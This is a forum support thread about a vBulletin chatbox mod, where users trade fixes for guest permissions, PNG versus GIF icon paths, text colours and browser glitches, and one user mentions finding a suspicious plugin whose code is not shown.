Only if you make your own hack for it. Valter said he would look into it at some point, but that was almost a year ago. Updating this mod doesn't seem to be a priority for him.

This happens to me when you are part of a usegroup that does not have permission to view the chatbox, for example banned users or unregistered/not logged in. Perhaps it's to do with you being logged out due to inactivity and becoming part of the not logged in usergroup?


Thank you for your response. I can confirm this as well, when I try to view the chatbox logged out it goes to the smilies page. BUT WHY THE SMILIES PAGE? How can I intercept this within the hack to make it go to a 404 page or something, lol.

How can I set the default text colour? I have removed black from the colour menu but it is still the default and my site is dark, so unless users change the text colour manually it writes invisible text.

Anyone else using the new 4.1.0 PL2 version of vBulletin have an issue with the new and old icons in the chatbox. Since I upgraded to the 4.1.0 now it just says new or old instead of the new and old icon.

If anyone is having this issue or knows how to fix it that would be great since I hate the way it looks right now.

I'm also having the same issue with the advanced forum statistics.

It looks like the newest version changed the format from gif's to png. How hard would it be to update the code for this and the advanced forum statistics to find the right file. I temporarily saved the png file and a gif and uploaded it to get it to work for now though.

go to your Style Manager
all style options.. tick the little arrow on the right pick style vars go into Style Variable Editor > search and change Blockrow Background color:)

Have had this mod on for quite some time now and has worked flawlessly until this week. We took the forum down and changed domains and reinstalled and updated it. To fix the smile, search in template vsa_chatbox_input

look for {vb:stylevar imgdir_editor}/smilie.gif

and change smilie.gif to smilie.png

To solve this, go to the language manager, edit settings for the language with problems, and clear out in the Date/Time Formating, for example i use spanish and this is how it should look!

But this oft-requested feature should become very easy once HTML 5's <audio> tag becomes common. However, right now it's very difficult, but the solution has been posted earlier in the thread. Not for the timid though, as it requires many manual edits.

But on closer inspection now I do. In fact I already have three entries in there - img, code, map. So there's your answer - just turn off images altogether, don't bother trying to resize them.

Formatting is per line, not applied per word.
Mode is WYSIWYG (you click on red, you see red, *before ever clicking on send)
Can send by hitting return key.
Input is one line at a time, no multi line messages
text size is not about your input, it's about the size of text for the entire chat box. i.e. Everybody types in the same size.
smilies supported, but can be disabled.

Been testing this and my members love it. I would like to be able to allow non-registered users to post in the chat room. is there away to turn them off and on?

In the "Permissions" I have:

"Usergroups able to view ChatBox but not post messages"

"Usergroups NOT able to view ChatBox (comma separated ID list)"

"Users with post count less than X can not view ChatBox - Set X"

I have the above set to 0 or the line is blank. I have used other chat's in the past to get these "lurkers" or people not registered yet to sign up (paid board). Is there away to allow them to post. When I tested this I could see the chat but could not post in it. As well the Chat room link did not show up in the nav bar when I was logged out.

Any way to fix this bug, it's clearly a problem for those of us who allow guests to read the chatbox. I could disable it but I find it helps people want to join if they can read the conversation and not take part in it.

Also it always says "and 1 guests" in the online section. Is this a bug, as it never says anything more than 1 and clearly I got like 2000 guests stuck in here at the moment.

We do not use this chat as a 24/7 thing. So it is important that I can get this working.

OK. I figured guest's would be part of the not registered/not logged in user group. We have a paid board so you have to contact and admin to register. So I guess I can set up a chat room only user group. People can then go through the auto registering process to become members of that one to use chat.

Yes you set that up in the options for the mod. The developer has made a great options screen to allow and not allow usergrougs ids to see, or message the chatbox.

That is exactly the same error message I am getting. The guy says he fixed it by disabling a mod, which is unfortunately the only thing I can do when I install these mods.

I'm disappointed that it seems to be working fine for others running 4.1.2, that means it's something wrong with my forum I guess :(

As it happens, i do read the first and last few pages of a mod. However, i obviously overlooked or misread ur post. Thanx for clarifying that you can't though. Your comment about it being better to have a private forum than a chatbox is wrong, or at least in my case it is. Can you imagine trying to hold a conversation/meeting with 20 mods/staff in a forum...it would be mayhem. Therefore a chatbox is more suitable in cases like this. Also, there was no need to be condescending, a simple "no" would suffice.

Not meant to be condescending. In fact, vb.org staff often repeats that you should read the ENTIRE thread before you install a mod. Hey - some don't work at all, and if you don't read back a few pages you won't know that.

Gotta disagree 180 degrees about a chatbox being less mayhem than a forum. A forum allows people to weigh in at their leisure and keeps a record of what everyone says for posterity. A chatbox demands you be present and cannot be referred to in the future. I can't imagine how you get 20 mods to come to a chatbox meeting all at the same time, but I'm envious. Is there a secret?

Is it a really old version of Internet Explorer? As I recall IE 6 and possibly 7 couldn't properly display PNG graphic files without a Javascript hack.

Don't worry, when I started, I too didn't know anything. But you'll learn that over time. Basically you need to FTP them to your directory. Or use those with png extension and just copy them, but this time with gif extension (it works).

If you installed vBulletin yourself, you at least know hot to FTP something. It's like working with directories on your HDD, but just on different server. If you don't know how to use FTP, please learn, but it's very easy. As I said, just like working with files on your disk (but you need program for FTP).

Actually, the mod (at least Advanced Forum Statistics from Valter too) still uses hard coded files. I don't use anymore his chat, but I use Advanced Statistics. I have them as I upgraded from vB3, maybe old versions of vB4 used gif? I know for sure that new (4.1.2 I'm using now) version uses png

This works really well and I am very pleased with it but since installing it yesterday my max users online ever on my new site has risen from 37 to 160 almost instantly.

All of the new visitors seem to be reading the chatbox archive.

I checked the IPs and they appear to be random users from all over the world but websites like mine do not just magically create an additional 120 users after installing one program. So there is something wrong here.

It's much easier to copy png files to needed gif files. If you rename image file just to have right extension (png becomes gif), mod will use them, as it just looks for this exact name (with gif extension). It doesn't matter what format image really is, everything will work fine.

Okay I already have it installed and really like this chatbox but I have a little concern to ask about this.

My host has this rule

Okay thank you for responding. So since i don't want to go to off site how would I configure this one as a shoutbox then.I already told you what to do. Look in the options section "Auto-refresh & Status" and adjust those settings. Mine is set to an auto-refresh interval of 30 seconds, a-r disabled for guests, and logout in 5 minutes.

You may also want to change the name (https://vborg.vbsupport.ru/showpost.php?p=1981718&postcount=399) to clarify it's no longer a chatbox.

thats what i have done, though i had to manually place it in the template and manually hide it from guests, so if a member logs out on a different window the page doesn't go hay-wire.. but the issue remains i would like guests to view the chatbox, we dont have much members and i want to show every spec of activity...

please fix this bug, i have seen it on many sites and have had many complaints from members, i dont want to deter anybody from the site, and i dont want to limit guest viewing...

This is a very good chat but advertises new posts in private forums to all users and not just the ones who should be able to see them. This means any private forums have to be blocked first so posts in them do not appear in chat. Also if you make the chat public, it fills up with an insane amount of users, more than I get reading my site most days. So its best kept as a members only chat, in that role it works very well.

Color customization questions crop up here all the time, but I'm not sure anyone has figured it out. Or if they have I missed it. I use only the default style, or close children of it, which seem to work fine.

A few of my members have said that this isn't working properly in chrome.

It is fine in firefox and other browsers.

However in chrome the shoutbox keeps moving and is always flickering.

I have a security issue related to this plugin. Today I noticed a plugin called "VSa - ChatBox -ILL" on my site, listed under product vBulletin (not the chatbox product). The plugin code was

Really, it would almost have taken less time to install Chrome than to type that you didn't have it. I wouldn't worry about it if it works for you as there probably isn't much you can do anyway. Maybe some kind of odd video issue on their computer.

I do not have this plugin. I like to think it was installed by one of your [former] admins, as opposed to an outside hacker, but who knows. Presumably they used the name of an existing plugin at random to make it harder to notice. I'd watch for it reappearing, change everyone's passwords including cpanel and ftp, and consider wiping the site clean and reinstalling everything.

As a chatbox, it's pretty resource-heavy. If that's an issue, you should look into using a hosted solution.

I don't think that's a problem with ChatBox per se, but sounds like the global cookie setting for your vBulletin installation might be misconfigured. You might play around under Options, Cookies and HTTP Header Options, Cookie Domain. Sometimes modifying that setting can help with situations like this.

Just found a good workaround, and it keeps with SEO best practices as well, figured I'd share since too many people figure out their problems and don't post the fix.

Using .htaccess to redirect nonWWW to www.
